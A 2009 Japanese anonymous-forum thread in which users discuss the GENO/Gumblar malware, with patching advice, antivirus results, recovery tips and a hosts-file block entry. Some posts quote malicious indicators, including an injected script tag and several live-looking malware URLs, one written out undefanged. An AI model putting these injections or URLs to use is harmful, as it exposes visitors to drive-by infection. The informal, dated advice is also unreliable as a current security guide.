[表示 : 全て 最新50 1-99 101- 201- 301- 401- 501- 601- 2chのread.cgiへ]
Update time : 05/09 15:33 / Filesize : 157 KB / Number-of Response : 689
[このスレッドの書き込みを削除する]
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

GENOウイルススレ ★22



1 名前:名無しさん@お腹いっぱい。 [2009/06/22(月) 12:15:57 ]
■ adobe readerを最新版にアップデートする
ttp://get.adobe.com/jp/reader/
 とりあえず最新版にしましょう。
 インストール後本体をアップデートしておく事
 adobe readerを開いて ヘルプ→アップデートの有無をチェック
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp

以上でGENOは防げるが亜種等のため以下推奨
■ acrobat javascriptをオフに
  adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
  FirefoxにてNoscriptを利用
  (Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
  (sleipnir、IEでも上手に設定するとなんとかなります)

優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
  hostsファイルに以下の行を追加
  127.0.0.1 martuz.cn
  hostsファイルの在処
  Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
  Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
  Windows 95/98/MEの場合→「C:\Windows」

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/

541 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 01:17:31 ]
>>540
前回のGENOに感染した疑いがあるなら、どのアンチウイルスソフトでも、
そのウイルスがあれば見つけてくれると思うけど、今騒がれてるやつだったら、
上で上がってるカスペとかでスキャンしたほうが、感染してるかしてないか
確実にわかるんじゃないかな

今回の亜種は前回よりやばいかもと思ったが、カスペがちゃんと検出してくれるようなら、
むしろ4月の時よりすぐに検出駆除してくれるだけ簡単というかマシなのかなと思った
ただ、起動しない状態まで感染してしまうと結構厳しいみたいだが

542 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 01:34:17 ]
>>541
ありがとう。たった今マカフィーフルスキャン終わったが感染無しだった。
Macのほうはメインマシンだから1日かかりそう><
とりあえず明日鯖業者にも連絡取ってみる+カスペたんの導入を考えてみる


543 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 01:52:04 ]
Avast!がPDFの検出をするようになった
SWFは未確認

544 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:02:39 ]
もうすぐnortonの期限が切れそうでどれにしようか迷っている
ノートンは最近の物は常駐時の挙動は割と軽くIDセーフ機能が便利なんだが対応が遅い・・
カスペルスキーは昔使っていた事もあったけどアプリに過剰反応したりと癖が強い印象

545 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:05:35 ]
スレ違いっぽいが
GENOの話ならノートンは対応してるぞ

546 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:10:38 ]
新型対策ならカスぺだろうが、亜種への対応には限界があり全てはカバーできないというのは念頭に置いた方がいい
flashとpdfに見切りをつけて更に常時、JS無効は現実的ではないからOSをVista以降にするのがベストだろう

547 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:13:07 ]
一口にGENO(新旧gamblar)と言っても、いくつものファイルが関係するから
ウイルス対策ソフトがどの段階で検知するかはマチマチ
全部スルーして、穴があるシステムはやられる

548 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:14:39 ]
MSの脆弱だけじゃないからね。
Adobeの脆弱性はノートンはやってくれないし。

549 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:16:51 ]
>>548
やってくれないとは?
間違いだと思うが



550 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:19:31 ]
嘘ばっかり言いやがるからな
2chだし適当に

551 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:19:31 ]
>>530
www.virustotal.com/jp/analisis/cddad168eb28751f3b9a7670ca03d0e8cee1745f7c746ded2fcc5daf463e570f-1256576880

> Avastが「JS:Downloader-FA」または「JS:Downloader-FC」で全件を検出。
> G Dataが「JS:Downloader-EZ」で13件を検出した。

G DataのEZって…

552 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:24:38 ]
>>546
ベストかもしれないが、現実的には_
うちの事務所は、みんなXPだし
とりあえず、うpだて最新にしとくことか…

553 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:32:28 ]
そういえばアドビやSunJavaのブラッドハウンドは見たことないね

554 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:37:29 ]
>>546
個人なら切り替えはまだ容易だろうが
企業、特に中小企業だと業務用のPC全てを
XPから切り替えるのは容易ではない

555 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 02:41:37 ]
このスレを覗きに来るような人たちには釈迦に説法だろうけど、
パッチ管理は多少面倒でももっとも効果的な対策
個人利用は無料のSecunia PSIで定期的なチェックをお勧め

Secunia Personal Software Inspector(PSI)ダウンロードページ
ttp://secunia.com/vulnerability_scanning/personal/
日本語訳がこなれていないから、当面は英語設定で使うほうがいいかも

556 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 03:06:16 ]
>>548-550
>>553

> 嘘ばっかり言いやがるからな
> 2chだし適当に

ttp://www.symantec.com/ja/jp/business/security_response/threatexplorer/threats.jsp
こちらを自分の目でご覧になりました?

557 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 03:11:55 ]
>>556
何を言いたいんだ?
書いてあるねってことかな


558 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 06:54:08 ]
今回のはもう他のウイルスと同じで、仮に感染してもOS起動が出来る場合は
カスペやAvastやノートン?でスキャンすれば検出や駆除が
きちんとできると思っていいのかな?
それなら感染してるのか分からずにパニクらずにすみそうで少しだけほっとした。
またすぐに違う亜種がでたらそれは別だろうけど。

559 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 07:09:31 ]
>>539
タスクスケジューラに登録するなら、窓の杜からじゃなく本家から落とした方がいいよ。
新バージョンで「Quietモード」が追加されてる。
hide9999.web.fc2.com/



560 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 16:58:43 ]
Gumblar再襲来(5) 感染でパソコン起動せず、サポート窓口に電話殺到
ttp://www.so-net.ne.jp/security/news/view.cgi?type=1&no=2047


561 名前:名無しさん@お腹いっぱい。 [2009/10/27(火) 18:22:52 ]
感染したHDドライブをスキャン中。
ノートンひっかかってくれるかな。。。

562 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 18:30:55 ]
未知の脆弱性を突かれたわけでもないのに、いつまで感染広がるんだろ。

563 名前:名無しさん@お腹いっぱい。 [2009/10/27(火) 18:37:47 ]
くるくるたああああああああああああああああいむ

564 名前:名無しさん@お腹いっぱい。 [2009/10/27(火) 18:51:34 ]
すでに10万ファイル調べてるのにひっかからん

くるくるたああああああああああああいむ

565 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 18:59:10 ]
Wエンジン故に通常使用ではやや重くて使い物にならないかもしれんが
こういった一時的な利用なら
カスペルとAVASTの両方の検索エンジンを搭載した
G-DATAでスキャンしてみるのも良いかもしれない


566 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 19:01:59 ]
>>561
ノートンならスキャンパフォーマンスプロファイルの設定を完全スキャンにしているか?

567 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/27(火) 19:06:11 ]
今のG-DATAはカスぺじゃなくてBitDefenderとavast!なのよね

568 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 00:57:50 ]
だから良くなったんだろ

569 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 04:46:17 ]
www●george-ohtsuka●com
これはGENOですか?別のウイルス?



570 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 05:46:27 ]
>>569
流行のGENO踏み台型感染(Web改ざん)タイプ、サイト管理人のPCも感染してる

</head>と<body>の間にscriptを1行仕込まれている
script src=●●●●//psunrise●cn/images-d/index2●php



571 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 06:31:28 ]
>>569
あとよく見ると<body>に続くiframe内のlifezilla.ru:8080/index.phpも怪しい
どうしてオランダ?

572 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 07:27:02 ]
>>569
新型GENO(gumblar.x)と、iframeインジェクションの両方に改竄されてるね。

ちなみに>>525の報告のように、
gumblar一派とiframeインジェクション一派は抗争中らしいw
ttp://blogs.yahoo.co.jp/noooo_spam/archive/2009/10/27
ttp://ilion.blog47.fc2.com/blog-entry-155.html

ショバ(botに引き込む無防備なPC)を取り合ってるのだろうか。

573 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 14:40:46 ]
感染したHDD、定義済みノートンで検知せず。
カスペでスキャン中。
やっぱりリカバリしかないのかな。
どっちにしろレジストリいじらなきゃだめか。

574 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 16:53:40 ]
>>573
リカバリしてもレジストリいじらなきゃだめなの?

575 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 17:19:46 ]
リカバリしたらレジストリも初期状態になってるからいじる必要はないと思うが。

576 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 20:59:36 ]
>>573
どうして感染したと分かるの?

起動時に黒い画面?
黒い画面だと、どうやってPCを起動させて、スキャンしてるの?

577 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 21:03:05 ]
IQが低いとそんな書き込みしかできない

578 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 21:25:51 ]
PCが、いちだ〜い、にだ〜い、…
ヒュ〜、どろどろどろ…

579 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 21:58:53 ]
>>575
ドライブがリカバリディスクを認識するものの
数時間まっても始まらないから、そこらへんもやられちゃってると思う。

調べた感じだとちゃんと読み込んでリカバリできるケースが多いみたいだけど。

一応カスペにトロイがひっかかったけど、明らかに今回のと違うやつなんだよな。。。
スキャニング後に復活したという報告もあるから、接続してみてダメそうだったらレジストリいじってみるよ。

とりあえず1症例として書いてみました。



580 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 23:07:03 ]
それは別のもんに感染してるんじゃないの
あとCDもしくはDVDドライブからの起動にしてる?

581 名前:579 mailto:sage [2009/10/28(水) 23:36:31 ]
カスペのスキャン後に復活したみたいです。
ありがたいことにレジストリまで修正してくれるみたいだ。
駆除リストから詳細を調べたいが、
カスペがウィルスリストをぜんぜん登録してくれてない。。。

不具合としては、ユーザープロファイルが読み込めなる様子。
アカウント移行すれば問題ないです。

>>580
今回のでビンゴだったみたいです、
カスペの公式サイトのウイルス名と違ったもので。
ありがとうございます。

582 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/28(水) 23:41:55 ]
検出名隠蔽してたら誰もわからんわな

583 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/29(木) 08:53:46 ]
これはGENOウイルスでしょうか?

症状:
Vistaにて
起動後、真っ黒の中にカーソルがポツン。動くけど右左クリック無効。
セーフモードだと起動。
regeditとcmdは起動。
sqlsodbc.chmも存在。ファイルサイズは通常通り。

どうでしょうか?

584 名前:名無しさん@お腹いっぱい。 [2009/10/29(木) 11:43:10 ]
1.感染したマシンからHDD抜く
2.HDDケースに入れる
3.感染していないPCにカスペたん入れる
4.感染しているHDDを外付けで3.のマシンに接続
5.スキャン

で駆除できるのかな?

人柱も嫌だし感染マシンが無いので検証してないけど

585 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/29(木) 15:34:50 ]
>>583
>起動後、真っ黒の中にカーソルがポツン。動くけど右左クリック無効。
この症状はもろにそんなかんじだね

586 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/29(木) 18:05:01 ]
>>583
UAC切ってたのか?

587 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 08:52:48 ]
>>583
いえ、ONにしてました。
悲しいのは、adobeを更新した次の日にこのような状態になってしまったことです。


588 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 14:53:51 ]
利用してる脆弱性はAdobeだけじゃないんでなんとも
まあおかしいことは事実だし、よくわからんならOS入れなおしたほうが早いね

589 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 17:16:28 ]
構造的には現状ではUACはスルーできんはずだが?
特にvistaのUACは7のデフォルト設定より粘着質
勢いで許可したかupdateのフェイクにでも引っかかったか



590 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 17:26:15 ]
>>583
カスペルのオンラインスキャナーではどうなりました?

591 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 18:41:44 ]
>>583
それGENOじゃあないだろ
Daonolだと思うんだが?

592 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/30(金) 18:51:27 ]
Daonolはvistaは対象外で手口もGENOとそう変わらない

593 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/31(土) 02:12:59 ]
じゃあなんなんだ
別のウイルスかハードの寿命か

594 名前:名無しさん@お腹いっぱい。 [2009/10/31(土) 10:30:44 ]
パソコンのことはよく知らずにいたのが
わるかったんだけどなんかうちのサイト、感染したっぽい。

avast!が反応するようになっちゃった。
ファイル名 ttp://hd-select●com/blog/mail/mail_test.php
マルウェア名 JS:Redirector-H7 [Trj]

って出るんです。
ファイル名のサイト、バイクの通販かなんかだがこんなサイト
いったことないのになあ。

感染確認の類は全部やって異常は見られなかったけど
悲しいかな、サイトは削除しました。

595 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/10/31(土) 18:08:11 ]
典型的なGENOですね
バイクの通販サイトは・・・多分、あそこかなw

596 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 00:08:38 ]
質問させてください
OSはXP、セキュリティソフトはウイルスバスター2009を利用しています。webからの脅威でこんなアドレスがあったんですがgenoなんでしょうか↓
fancyrat●ru/cgi-bin/pomet2008●php

とりあえずファイルの起動・サイズの確認とウイルススキャンはしましたが異常は特になし。毎度ソフトのアップデートはしてるとは言え感染しているか心配です。

597 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 00:12:15 ]
要求されたURLのWebページを表示できません
URL:
fancyrat.ru/cgi-bin/pomet2008.php
このWebページはウイルスに感染しています
次のウイルスが見つかりました: Trojan-Downloader.JS.Gumblar.x

598 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 00:12:58 ]
aaa
miss
url変えてなかった。
開かんでおくれ。

599 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 00:44:40 ]
>>594
関係ないサイトのコードが注入されるのが典型的なパターン
サイトは削除だけじゃなくそのサイト自体が無効にならないと
そのままのっとられる可能性があるので注意してください

感染確認というのが旧型Genoの確認方法だとしたら意味がないので
カスペルスキーなどほかのスキャンエンジンでスキャンしてみてください



600 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 00:45:56 ]
>>596
はい
新型のほうのGenoです
スキャンは他のメーカーのでもしてみてね

601 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 01:00:36 ]
レス下さった方ありがとうございます、新型なんですね……
バスター・ノートンのオンラインスキャンでは今のところ何も検出されてません。早めにOSのアンインストールしたいと思います。

602 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 02:29:58 ]
最新の定義ならブロックしてくれてる可能性もあるが
まぁ、カスペルスキーのオンラインスキャンをしてみてはどうだろう

603 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 03:26:46 ]
firefox用のpdfプラグインは9.1.0.163が最新?
readerは9.2だけどこれでいいのかな

604 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 03:40:56 ]
今更だけどなんでこうなったという感じだな
去年くらいから兆候があったと思うけどここまで広がるとは思ってなかった
一体、Gumblarの作者は何を考えて作ったんだろうか
vistaだけど巡回しまくるから油断はできないな

605 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 14:01:26 ]
>>597
情報収集をするためにこのスレをロムっていたが
ミスって踏んでしまった…

606 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 14:20:11 ]
>>605
大丈夫?

607 名前:605 mailto:sage [2009/11/01(日) 19:42:24 ]
>>606
まとめの感染確認方法で調べてみましたが
一応、セーフでした、お騒がせして申し訳ありません。

608 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 20:19:53 ]
それは意味ないと何度言えば

609 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 21:12:40 ]
vista/7ならおそらくセーフ
XPならバスター・ノートンはスルー報告有でカスぺ・G-DATA・Avast以外はアウトかも
新型が未知のセキュリティホールを突いていたらの話だけど



610 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 22:11:53 ]
GENOに限った話ではないのですが、
ウイルスによって改ざんされているサイト管理者に対してメールでお知らせする場合に
的確かつ、相手に対して失礼にならないような文面のテンプレないでしょうか?

611 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 22:44:39 ]
>>610
メールで教えるのは考え直した方がいいかと

612 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/01(日) 23:53:21 ]
>>610
どんなに丁寧にいっても聞かないやつは聞かない
ぼくの環境では異常ありませんけど^^;とか言われる
レンタル鯖ならレンタル元に連絡したほうが確実だと思うよ

613 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 16:11:17 ]
>>597
こういう判定ってどこでできるの?

614 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 17:34:15 ]
aguseで確認すればいいだろ。

615 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 19:55:16 ]
過信は禁物だけどな

616 名前:610 mailto:sage [2009/11/02(月) 20:48:14 ]
調べてみたところレンタルサーバだったので、そっちの連絡フォームから通報してみました。

www.ipa.go.jp/security/todoke/
ここへ届け出たら、サイト管理者(orサーバ管理者)へ連絡してもらえたのだろうか・・

617 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 20:52:12 ]
>>616
報告したならもうそれでいいだろ
>ここへ届け出たら、サイト管理者(orサーバ管理者)へ連絡してもらえたのだろうか・・
ってわざわざうrl貼られても困るしここで聞くことじゃない

618 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 20:53:53 ]
>>617
それは大変失礼しました。

619 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/02(月) 21:44:39 ]
>>616
どちらでも何らかの対処はされると思います
レンタルサーバ側に直接連絡してもたいていは対応してくれるはず
数日様子見て直らないようならIPAにも連絡すればいいんじゃないかな



620 名前:名無しさん@お腹いっぱい。 [2009/11/02(月) 22:29:02 ]
ずいぶん情報集まってきたな
itpro.nikkeibp.co.jp/article/COLUMN/20091028/339633/

621 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 00:09:53 ]
すみません、情報下さい。
クレクレなのは承知です

デジカメ写真保存用に使っていたfujitsu lx50kが、スタンバイから
復帰する時にgenoウイルスに感染した様です。
起動すると真っ黒な画面にマウスポインタがポツリ。
セーフモードでも同様。
とにかくデータだけでも救出しようとして、ubuntu 9.04のライブCD挿入。
しかし、エラー多発で起動せず。
前回は動作したのでメディアの問題ではないかと。

で、富士通のサポートHPによると回復できる様ですが、
その際データが消去されないか心配です。
その点については触れられていなかったので・・・
ipod touchからの書き込みなので、あまり長い文章は書くのに時間が掛かります。
この場合、データは消去されてしまいますか?

本当に困っています。
釣りではありません。
どうか教えて下さい。

622 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 00:41:41 ]
>>621
> デジカメ写真保存用に使っていたfujitsu lx50kが、スタンバイから
> 復帰する時にgenoウイルスに感染した様です。
このとき感染したんじゃなくてその前から
感染してて復帰タイミングで発病したってだけでしょ

ubuntuの前回使用はいつなの?
メディアの問題じゃないってなんで断言できるの?

コマンドプロンプトからの復帰もしくはリカバリと
https://www.fmworld.net/cs/azbyclub/qanavi/jsp/qacontents.jsp?PID=0408-4161&rid=204#case2-1

コマンドプロンプトの操作だけで復帰できればおそらく問題なし
リカバリが必要だとすればリカバリディスクにバックアップツールがあればできそう
マイリカバリにありそうな感じだけどFMV使ったことないのでわかりません

> ipod touchからの書き込みなので、あまり長い文章は書くのに時間が掛かります。
これは何が言いたいのかわかりません。

> 本当に困っています。
だから何?
本当に困っててわからないならどこかに有償サポート求めたほうがいいと思います。

623 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 01:16:49 ]
>>622
私の書き込みによって不快にさせてしまいましたか?
もしそうであれば申し訳ありません。

データは消えないという事で、安心しました。明日、ゆっくり対処しようと思います。
それでもダメでしたら、素直にメーカーに修理にだします。
ありがとうございました。

スレ汚しすみませんでした。

624 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 04:49:27 ]
管理人が気が付いて対処するまで、新型に感染してたサイトとは知らずに
そのサイトが感染してた期間中頻繁にアクセスしてたので、
今回100%感染したと思ってたのだが、カスペ試用版でスキャンしても何も検出されず、
黒い画面で立ち上がらないという症状もなく、どうやら感染してないようなのですが、
むしろなぜ感染しなかったのか不思議です。

OSはXPSP2で、カスペとは違うアンチウイルスソフトは最新にしていて、
AdobeやWindowsUpdateは最新のものは気が付かなくてあててなくて、
最新のひとつかふたつ前ぐらいのバージョンの状態でした。
Vistaでも感染してる人もいるのに、こんなんでも感染しなかったのが謎ですが、
それともカスペでも検出しないなにかあったりして、実は感染してるとかなのでしょうか?
前回のGENOみたいに、感染したらファイルのサイズが変わるとか
確認できる方法があれば、まだ分かりやすいのにな。

625 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 05:07:04 ]
>>624
最新のひとつかふたつ前だったからOKだったんだなきっと

626 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 05:36:11 ]
>>625
やはりそう思われますか?
過信はもちろん禁物ですが、今回の新型に限っては
カスペルが感染してたら検出できるようですし
やっぱりギリギリセーフだったのかな?
ということは今回の新型は、最新のひとつかふたつ前より更に前の
脆弱性を狙ったものだったということになるのかもしれませんね。
もちろん自分がたまたまなだけかもしれないし、常に最新にしておくのが当たり前ですが。

627 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 07:21:58 ]
いろんなサイトを巡回する人は特に注意
OSとAdobeのアップデート
XPでもFirefox+NoScriptでだいたいは防げる

628 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 09:46:35 ]
お客様のPCが起動不能に
どうやらDaonolのようでした

629 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 20:06:21 ]
>>624
挿入されたサイトのスクリプトが無効化されたあとのアクセスなら何も起こらない
被害サイトアクセスした時期によるかも

脆弱性はAdobeのものだけじゃなくOSのものも含まれてたんで
更新してなきゃくらってたはず



630 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 20:07:24 ]
ついでにこれを機にSP3まであてて最新のパッチを当ててね

631 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 21:28:47 ]
>>629
無効化されたあとではなかったみたい。
そのサイトの説明だと、感染して改変されてから5日間くらい気が付かずに、
感染そのままの状態だったようで、その間何度も見にいってたから、
最新にはしてなかったから絶対に感染したと思ってました。

632 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/03(火) 22:47:25 ]
>>631
そのサイトがどこかわからんけど無効化されていたかどうか
実際に見てないならわからないよ
サイト管理者が確認したのは自分のサイトの改変だけじゃないの

実際に有害なのはそのサイト自身ではなく、そこに挿入されてる他所のサーバのスクリプト
自分のサイトは改変されてても挿入元がすでに消去もしくは
コード改変による無効化が行われていたとしたら閲覧したPCに被害は
ないかもしれないってだけだよ

633 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 00:00:36 ]
>>632
なるほど!スクリプトなどを書かれてソースコード改変イコール確実に感染
かと勝手に思っていましたが、そのサイト管理人でも気付かないうちに、
挿入元がすでに消去とかされてる場合もあるのですね。
FTPにもかなり何度もアタックがありパスも書き換えられて
盗み見されたようでいたちごっこのようだったとも書かれていたので、
その時間帯も閲覧してたからもうだめぽと思って、カスペルスキーでスキャンかけまくりましたが、
そういう場合もあるのだと初めて分かりました。無知で恥ずかし杉ますが、
分かりやすく何度も教えて下さって本当にありがとうございます。
検出結果もゼロでしたし、感染しなかったんだとようやくこれで安心できそうです。
でもこれからはもっとupdateとか気をつけなければ。
本当にレスありがとうございました。何度もうざい連投すみません。

634 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 00:27:03 ]
何度も改ざんされたなら生きてるとこを挿入されそうな気がするけどなあ
ブラウザが古いキャッシュでも見てたのかな

635 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 00:29:26 ]
コード改変による無効化って、感染→スクリプト挿入などのコード改変
→更に自動的に無効化?
うーん?

今回の新型は前のGENOと同じように危険なサイトにつなぐURLを挿入したり、
そこから情報漏れさせたり、PC自体を立ち上がらなくしたりするのが主な症状って認識でいいのかな?
スクリプトを仕込まれたサイトを閲覧して、その時脆弱性があれば危険サイトに勝手に繋ぎ、
更に最終的に立ち上がらないようにまでしてしまうということなのかね
仮に閲覧しても最初のスクリプトを自分のパソに挿入させなければ、
そこで終わってセーフてことか

636 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 01:35:36 ]
挿入元の攻撃スクリプトが内紛か何かで無害なコードにおきかわったらしく
それを適当に無効化っていっちゃってるかんじですはい

なんつーかよくわからないまま混乱しちゃってるんじゃないかな
めんどいんで引用で

> 今回の新型は前のGENOと同じように危険なサイトにつなぐURLを挿入したり、
> そこから情報漏れさせたり、PC自体を立ち上がらなくしたりするのが主な症状って認識でいいのかな?
なんかちょっと違う気もするけどなんとなくはい

> スクリプトを仕込まれたサイトを閲覧して、その時脆弱性があれば危険サイトに勝手に繋ぎ、
これはいいえ
脆弱性があってもなくても仕込まれたサイトを閲覧すればスクリプトコードは読み込みに行く
攻撃が失敗か成功かってだけ

> 更に最終的に立ち上がらないようにまでしてしまうということなのかね
これは向こうのミスでそうなってしまったらしい
情報搾取が目的だから起動不能になるのは失敗なはず
ならないパターンもあるかもしれないしないかもしれない

> 仮に閲覧しても最初のスクリプトを自分のパソに挿入させなければ、
> そこで終わってセーフてことか
まあはい
そのへんはFirefox+NoScriptでブロックってことだけど理解できない人にはおすすめできない

一般ユーザーから見たらOS含めた各種ソフトの更新とセキュリティ対策ソフトを
きちんとインストールってのが基本的な対策なことに変わりはないんで変に混乱する必要はないです

637 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 02:40:54 ]
あくまで基本であってこの手の問題は永遠のいたちごっこだからねぇ
今はXPがたまたま脆弱性を突かれただけで
当然この先Vista、W7の脆弱性を狙った新種や派生が次から次と現れてくるだろうから
ネットに繋いでる以上は常にリスクと隣り合わせなんだっていう
自覚を忘れないことが大切だと思うよ

638 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 02:45:39 ]
それぞれを最新UPDATEしてたら攻撃されても阻止でき、感染せずにすむってことか
反対に阻止出来ず感染したらカスペスキャンで検出され駆除のパターンてことか
丁寧にサンクス!

>>634
何度もその感染してた期間に閲覧してたみたいだから
古いキャッシュでも見てたというのはさすがにないんじゃないか?
それとも攻撃側がってことか?

639 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:00:00 ]
だよなー
なんだろうなあ
カスペのスキャンが実は古かったとかないよね



640 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:04:38 ]
今のところ突かれている脆弱性は既知のものだけなのは幸いだな。
攻撃側も未知の脆弱性を探し出すほどの暇人やスーパークラッカーではないってことだろう。

641 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:19:32 ]
偶然発見しちゃうときもあるから大丈夫ともいえないけどね

642 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:33:03 ]
>>639
カスペは試用版ですが、データはもちろん最新にしてスキャンしました。
foxとノースクリプトを使っていたので大丈夫だったのかな?
とも思ったのですが、やっぱり感染してないのがおかしいみたいですよね…。
やっぱり安心せずにリカバリするべきなのかな…。

643 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:36:31 ]
今回の新型、今までのレスとか情報を見ると、カスペルスキーで検知された場合には
gumblarで検知されて駆除されるんだよね
実際にカスペルスキーで見つかって駆除した人いないかな?

644 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:39:13 ]
>>642
NoScript使ってたなら普段のドメインとは別の見知らぬドメインがブロックされてたはず
それで大丈夫だったのかも
まあ心配ならリカバリが一番安全安心確実

645 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:48:40 ]
ちと疑問
新型GENOは、感染してからファイルやデータを
バックアップしても平気というか間に合うのか?

646 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 07:23:33 ]
GENOはBIOSやブートセクタや他のファイルを書き換えてくタイプでないし
